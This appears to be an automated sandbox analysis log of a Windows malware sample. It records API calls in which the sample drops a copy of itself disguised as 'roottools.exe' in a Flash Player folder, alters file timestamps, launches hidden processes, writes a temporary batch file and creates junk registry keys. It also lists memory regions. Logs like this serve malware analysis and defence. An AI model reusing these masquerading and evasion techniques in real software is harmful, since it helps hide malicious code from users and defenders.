Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Keyboard True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\IAM True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Feeds True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Fax True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Direct3D True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\IAM True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\IMEJP True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\FTP True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Feeds True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\SQMClient True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Feeds True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Exchange True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Feeds True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Kaev True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\SQMClient True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSDAIPP True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Fax True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Lukuip True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Boteun True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows True 1
Fn
Registry Get Key Info reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
System Get Computer Name result_out = YKYD69Q True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = InstallDate, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = DigitalProductId False 1
Fn
System Get Info type = Operating System True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, type = size, size_out = 196608 True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, size = 196608, size_out = 196608 True 1
Fn
Data
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 196608 True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77270000 True 1
Fn
File Create filename = \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = FILE_WRITE_EA, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming, type = time True 1
Fn
System Get Time type = System Time, time = 2018-01-10 18:52:49 (UTC) True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys, desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Fn
System Get Time type = System Time, time = 2018-01-10 18:52:49 (UTC) True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys, desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Fn
System Get Time type = System Time, time = 2018-01-10 18:52:49 (UTC) True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys, desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Fn
System Get Time type = System Time, time = 2018-01-10 18:52:49 (UTC) True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\Microsoft OneDrive.rig, desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys, desired_access = FILE_WRITE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Fn
Process Create process_name = "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe", os_pid = 0x7a8, creation_flags = CREATE_DEFAULT_ERROR_MODE, show_window = SW_HIDE True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
Mutex Release mutex_name = 9B4D68961731FE3C22DA08B640799EB6 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat, size = 200 True 1
Fn
Data
Environment Get Environment String name = ComSpec, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Process Create process_name = "C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat", os_pid = 0x7f0, creation_flags = CREATE_DEFAULT_ERROR_MODE, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Process #7: roottools.exe
(Host: 674, Network: 0)
+
Information Value
ID #7
File Name c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe
Command Line "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe"
Initial Working Directory C:\Users\aETAdzjz\AppData\Roaming\
Monitor Start Time: 00:01:23, Reason: Child Process
Unmonitor End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration 00:08:50
OS Process Information
+
Information Value
PID 0x7a8
Parent PID 0x65c (c:\users\aetadzjz\appdata\roaming\iuoldw.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 97C
0x 980
0x 24C
0x 184
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True True False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True True False
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False
private_0x0000000000210000 0x00210000 0x002affff Private Memory Readable, Writable True True False
private_0x0000000000210000 0x00210000 0x0025ffff Private Memory Readable, Writable True True False
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000220000 0x00220000 0x00226fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000230000 0x00230000 0x00231fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000240000 0x00240000 0x00247fff Private Memory Readable, Writable True True False
private_0x0000000000250000 0x00250000 0x0025ffff Private Memory Readable, Writable True True False
private_0x0000000000260000 0x00260000 0x0029ffff Private Memory Readable, Writable True True False
private_0x00000000002a0000 0x002a0000 0x002affff Private Memory Readable, Writable True True False
rsaenh.dll 0x002b0000 0x002ebfff Memory Mapped File Readable False False False
pagefile_0x00000000002b0000 0x002b0000 0x002b0fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000002f0000 0x002f0000 0x0036ffff Private Memory Readable, Writable True True False
private_0x0000000000370000 0x00370000 0x003effff Private Memory Readable, Writable True True False
roottools.exe 0x00400000 0x00432fff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000400000 0x00400000 0x0041bfff Private Memory Readable, Writable, Executable True True False
private_0x0000000000440000 0x00440000 0x0057ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000440000 0x00440000 0x0051efff Pagefile Backed Memory Readable True False False
private_0x0000000000540000 0x00540000 0x0057ffff Private Memory Readable, Writable True True False
private_0x0000000000590000 0x00590000 0x0068ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000690000 0x00690000 0x00817fff Pagefile Backed Memory Readable True False False
private_0x0000000000860000 0x00860000 0x0086ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000870000 0x00870000 0x009f0fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000a00000 0x00a00000 0x01dfffff Pagefile Backed Memory Readable True False False
private_0x0000000001e00000 0x01e00000 0x021fffff Private Memory Readable, Writable True True False
sortdefault.nls 0x02200000 0x024cefff Memory Mapped File Readable False False False
private_0x00000000024d0000 0x024d0000 0x026fffff Private Memory Readable, Writable True True False
private_0x00000000024d0000 0x024d0000 0x0263ffff Private Memory Readable, Writable True True False
private_0x00000000024d0000 0x024d0000 0x0253ffff Private Memory Readable, Writable True True False
private_0x0000000002540000 0x02540000 0x0257ffff Private Memory Readable, Writable True False False
private_0x0000000002600000 0x02600000 0x0263ffff Private Memory Readable, Writable True True False
private_0x00000000026c0000 0x026c0000 0x026fffff Private Memory Readable, Writable True True False
pagefile_0x0000000002700000 0x02700000 0x02af2fff Pagefile Backed Memory Readable True False False
staticcache.dat 0x02b00000 0x0342ffff Memory Mapped File Readable False False False
private_0x0000000003430000 0x03430000 0x0352ffff Private Memory Readable, Writable True True False
private_0x0000000003530000 0x03530000 0x0b52ffff Private Memory Readable, Writable, Executable True False False
private_0x000000000b530000 0x0b530000 0x0b79ffff Private Memory Readable, Writable True True False
private_0x000000000b7a0000 0x0b7a0000 0x0b89ffff Private Memory Readable, Writable True False False
msvbvm60.dll 0x72940000 0x72a92fff Memory Mapped File Readable, Writable, Executable True False False
dwmapi.dll 0x74640000 0x74652fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x74660000 0x746dffff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x746f0000 0x746f7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x74700000 0x7475bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74760000 0x7479efff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x74880000 0x748bafff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x748c0000 0x748d5fff Memory Mapped File Readable, Writable, Executable False False False
secur32.dll 0x748e0000 0x748e7fff Memory Mapped File Readable, Writable, Executable False False False
dhcpcsvc.dll 0x748f0000 0x74901fff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x74910000 0x74916fff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x74920000 0x7493bfff Memory Mapped File Readable, Writable, Executable False False False
sxs.dll 0x74940000 0x7499efff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74dc0000 0x74dcbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74dd0000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x74e30000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x74e90000 0x74ea8fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x74eb0000 0x74eb4fff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x74ec0000 0x750bafff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x750c0000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x750d0000 0x75126fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75130000 0x751bffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75250000 0x75295fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x752a0000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x75350000 0x75444fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75450000 0x755abfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x755b0000 0x7564cfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x756e0000 0x7577ffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75780000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75790000 0x7588ffff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x75890000 0x758c4fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x758d0000 0x759ecfff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759f0000 0x75afffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75b00000 0x75bcbfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75c50000 0x76899fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76b60000 0x76beefff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76c40000 0x76d75fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76d80000 0x76e6ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True True False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True True False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x77240000 0x77245fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77270000 0x773effff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True True False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True True False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True True False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Threads
Thread 0x97c
(Host: 638, Network: 0)
+
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsTNT, address_out = 0x0 False 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75a05235 True 1
Fn
Mutex Create - True 1
Fn
Module Get Handle module_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, base_address = 0x400000 True 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
Module Get Filename module_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 True 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = OLEAUT32.DLL, base_address = 0x76b60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = OleLoadPictureEx, address_out = 0x76bc70a1 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x76b60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = DispCallFunc, address_out = 0x76b73dcf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x76b707b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x76b91ca9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = CreateTypeLib2, address_out = 0x76b78e70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromUdate, address_out = 0x76b77684 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarUdateFromDate, address_out = 0x76b7cc98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetAltMonthNames, address_out = 0x76ba903a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNumFromParseNum, address_out = 0x76b76231 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarParseNumFromStr, address_out = 0x76b75fea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR4, address_out = 0x76b83f94 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR8, address_out = 0x76b84e9e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromDate, address_out = 0x76badb72 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromI4, address_out = 0x76b92a8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromCy, address_out = 0x76bad737 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromDec, address_out = 0x76bae015 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromTypeInfo, address_out = 0x76bacc3d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromGuids, address_out = 0x76bad1c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetRecordInfo, address_out = 0x76bad48c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetRecordInfo, address_out = 0x76bad4c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetIID, address_out = 0x76bad509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetIID, address_out = 0x76b7e7bb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCopyData, address_out = 0x76b7e496 True 1
Fn
